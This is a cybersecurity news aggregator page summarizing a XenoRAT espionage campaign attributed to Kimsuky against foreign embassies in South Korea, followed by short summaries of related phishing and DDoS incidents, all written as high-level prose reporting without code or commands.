CyberHappenings logo
☰
🏠 Home 📂 Browse ℹī¸ About

XenoRAT malware campaign targets foreign embassies in South Korea

First reported
Last updated
📰 3 unique sources, 3 articles

Summary

Hide ▲

A state-sponsored espionage campaign has targeted foreign embassies in South Korea since March 2025, deploying XenoRAT malware from malicious GitHub repositories. The campaign has launched at least 19 spearphishing attacks against high-value targets, including Central and Western European embassies. The attacks have been attributed to North Korean actor Kimsuky (APT43) with medium confidence, but there are indications of possible Chinese involvement. The malware, XenoRAT, is a powerful trojan capable of logging keystrokes, capturing screenshots, accessing webcams and microphones, performing file transfers, and facilitating remote shell operations. The campaign used highly contextual and multilingual email lures, often timed to match real events, and delivered password-protected archives containing malicious .LNK files. The campaign used cloud storage solutions like Dropbox and Daum Cloud to deliver the XenoRAT payload. The campaign's activity patterns, including timezone analysis and holiday pauses, suggest possible Chinese involvement. The attackers used a decoy document to mask the malicious activity. The campaign's activity was largely originating from a timezone consistent with China. The attackers practiced 'rapid' infrastructure rotation to avoid detection. The campaign used cloud infrastructure to help malicious activities fly under the radar. The attackers used Korean services and infrastructure to blend into the South Korean network.

Timeline

  1. 18.08.2025 22:38 📰 3 articles

    XenoRAT malware campaign targets foreign embassies in South Korea

    A state-sponsored espionage campaign has targeted foreign embassies in South Korea since March 2025, deploying XenoRAT malware from malicious GitHub repositories. The campaign has launched at least 19 spearphishing attacks against high-value targets, including Central and Western European embassies. The attacks have been attributed to North Korean actor Kimsuky (APT43) with medium confidence, but there are indications of possible Chinese involvement. The malware, XenoRAT, is a powerful trojan capable of logging keystrokes, capturing screenshots, accessing webcams and microphones, performing file transfers, and facilitating remote shell operations. The campaign used highly contextual and multilingual email lures, often timed to match real events, and delivered password-protected archives containing malicious .LNK files. The campaign used cloud storage solutions like Dropbox and Daum Cloud to deliver the XenoRAT payload. The malware is delivered via password-protected ZIP files hosted on cloud services. The attackers used a Windows shortcut (LNK) masquerading as a PDF document to execute the payload. The campaign employed rapid infrastructure rotation, updating payloads multiple times within an hour. The attackers used GitHub to fetch next-stage malware and establish persistence through scheduled tasks. The campaign's activity patterns, including timezone analysis and holiday pauses, suggest possible Chinese involvement. The attackers used a decoy document to mask the malicious activity. The campaign's activity was largely originating from a timezone consistent with China. The attackers practiced 'rapid' infrastructure rotation to avoid detection. The campaign used cloud infrastructure to help malicious activities fly under the radar. The attackers used Korean services and infrastructure to blend into the South Korean network.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

APT41 Targets U.S. Trade Officials in Cyber Espionage Campaign

The House Select Committee on China has issued a warning about ongoing cyber espionage campaigns by China-linked APT41 targeting U.S. trade officials and related organizations. The attacks involve phishing emails impersonating U.S. officials to steal sensitive information. The campaign coincides with contentious U.S.-China trade negotiations. The threat actors exploit software and cloud services to cover their tracks. The attacks aim to steal valuable data and gain unauthorized access to systems. The committee has noted similar tactics used in previous campaigns, including a January 2025 spear-phishing attempt targeting committee staffers. The FBI is investigating the ongoing cyber espionage campaign. APT41 has been known to conduct financially motivated activities in addition to state-sponsored espionage. The group has targeted various sectors, including logistics, utilities, healthcare, high-tech, and telecommunications. The committee recommends user awareness phishing training, mandatory multifactor authentication, FIDO keys, and appropriate email gateway and endpoint security tools to mitigate such attacks.

Open in new tab

Kazakhstan's KazMunayGas Phishing Test Mistaken for Noisy Bear Campaign

Kazakhstan's state-owned oil and gas company KazMunayGas conducted a phishing test in May 2025, which was initially misinterpreted as a cyber espionage campaign by a new threat group named Noisy Bear. The test involved phishing emails targeting KazMunayGas employees with fake documents related to internal communications and policy updates. The phishing emails were sent from a compromised internal email address and included a ZIP attachment with a Windows shortcut (LNK) downloader, a decoy document, and a README.txt file with instructions. The campaign was designed to mimic official internal communications and included themes such as policy updates, internal certification procedures, and salary adjustments. The phishing test was conducted to train employees on identifying and responding to phishing attempts. However, it was mistakenly reported as a cyber espionage campaign by Seqrite Labs, which attributed the activity to a new threat group tracked as Noisy Bear. The threat actor was believed to be of Russian origin and had been active since at least April 2025. The misinterpretation led to speculation about the involvement of a new threat group and the use of sophisticated malware, including a PowerShell loader dubbed DOWNSHELL and a DLL-based implant. The threat actor used a compromised email address belonging to a KazMunayGas finance department employee to send phishing emails. The phishing emails impersonated mundane company business, including reviewing work schedules, incentive systems, and wages. The phishing emails contained a ZIP file with a decoy document and a shortcut (LNK) file named "Salary Schedule.lnk." The LNK file downloaded a batch script, which retrieved the attackers' PowerShell loader named DownShell. DownShell consists of two scripts: one for anti-analysis by undermining the Windows Antimalware Scan Interface (AMSI), and another for CreateRemoteThread Injection to establish a reverse shell. Noisy Bear used a sanctioned Russian bulletproof hosting provider, Aeza Group, to maintain its infrastructure. The threat activity carries geopolitical implications, targeting Kazakhstan's largest oil and gas company, which is state-owned and a significant economic entity. Seqrite Labs found infrastructure and tooling overlaps across other Central Asian attacks, indicating a broader campaign. The incident highlights the importance of clear communication and coordination between cybersecurity researchers and organizations to avoid misinterpretations and ensure accurate reporting of cyber threats.

Open in new tab

SVG Files Used to Deploy Phishing Pages in Colombian Judicial System Impersonation Campaign

A malware campaign leveraging SVG files to deploy Base64-encoded phishing pages impersonating the Colombian judicial system has been identified. The SVG files, distributed via email, execute JavaScript payloads to inject phishing pages and download ZIP archives. The campaign involves 523 unique SVG files that have evaded detection by antivirus engines. The earliest sample dates back to August 14, 2025. The campaign highlights the evolving tactics used by threat actors to bypass security measures and target macOS systems with information stealers like Atomic macOS Stealer (AMOS). This campaign also coincides with broader trends in cyber threats targeting macOS and gamers.

Open in new tab

Iranian Homeland Justice Group Targets Global Embassies in Phishing Campaign

An Iranian-aligned group, Homeland Justice, has conducted a coordinated, multi-wave spear-phishing campaign targeting embassies and consulates in Europe and other regions. The campaign involves sending spear-phishing emails disguised as legitimate diplomatic communications to deploy malware. The phishing emails exploit geopolitical tensions and use compromised email accounts to send malicious Microsoft Word documents. The malware establishes persistence, contacts a command-and-control server, and harvests system information. The campaign is part of a broader regional espionage effort aimed at diplomatic and governmental entities during a time of heightened geopolitical tension. The campaign began on August 19, 2025, and targeted around four dozen embassies, consulates, and government ministries globally, as well as various international organizations. The campaign is assessed to have concluded shortly after it began, with the attackers' command-and-control infrastructure appearing inactive.

Open in new tab

Cloudflare mitigates 11.5 Tbps UDP flood DDoS attack

Cloudflare recently mitigated the largest recorded volumetric DDoS attack, peaking at 11.5 Tbps. The attack was a UDP flood primarily originating from a combination of several IoT and cloud providers, including Google Cloud. It lasted approximately 35 seconds. Cloudflare has seen a significant increase in DDoS attacks, with a 198% quarter-over-quarter increase and a 358% year-over-year jump in 2024. The company mitigated 21.3 million DDoS attacks targeting its customers and 6.6 million attacks targeting its own infrastructure during an 18-day multi-vector campaign in 2024. The most significant spike was seen by network-layer attacks, which saw a 509% year-over-year increase since the start of 2025. The attack was part of a series of hyper-volumetric DDoS attacks, with the largest reaching peaks of 5.1 Bpps and 11.5 Tbps. The attack was conducted by sending requests from botnets that had infected devices with malware. The RapperBot kill chain targets network video recorders (NVRs) and other IoT devices for DDoS attacks. The malware exploits security flaws in NVRs to gain initial access and download the payload, using a path traversal flaw to leak valid administrator credentials and push a fake firmware update. The malware establishes an encrypted connection to a C2 domain to receive commands for launching DDoS attacks and can scan the internet for open ports to propagate the infection. The attackers' methodology involves scanning the internet for old edge devices and brute-forcing or exploiting them to execute the botnet malware. Google's abuse defenses detected the attack, and they followed proper protocol in customer notification and response. Cloudflare has been automatically mitigating hundreds of hyper-volumetric DDoS attacks in recent weeks, with the largest reaching peaks of 5.1 Bpps and 11.5 Tbps. Volumetric attacks typically aim to overwhelm servers or networks, causing them to slow or shut down completely. The attack's short duration of 35 seconds highlights that size alone is not the most critical metric for evaluating DDoS attacks. The complexity and persistence of an attack, along with its impact on users, are more important metrics for DDoS defense. A DDoS mitigation service provider in Europe was targeted in a 1.5 Bpps denial-of-service attack. The attack originated from thousands of IoTs and MikroTik routers and was mitigated by FastNetMon. The attack was primarily a UDP flood launched from compromised customer-premises equipment (CPE), including IoT devices and routers, across more than 11,000 unique networks worldwide. The attack was detected in real-time, and mitigation action was taken using the customer's DDoS scrubbing facility. FastNetMon's founder, Pavel Odintsov, called for ISP-level intervention to stop the weaponization of compromised consumer hardware. The attack was one of the largest packet-rate floods publicly disclosed.

Open in new tab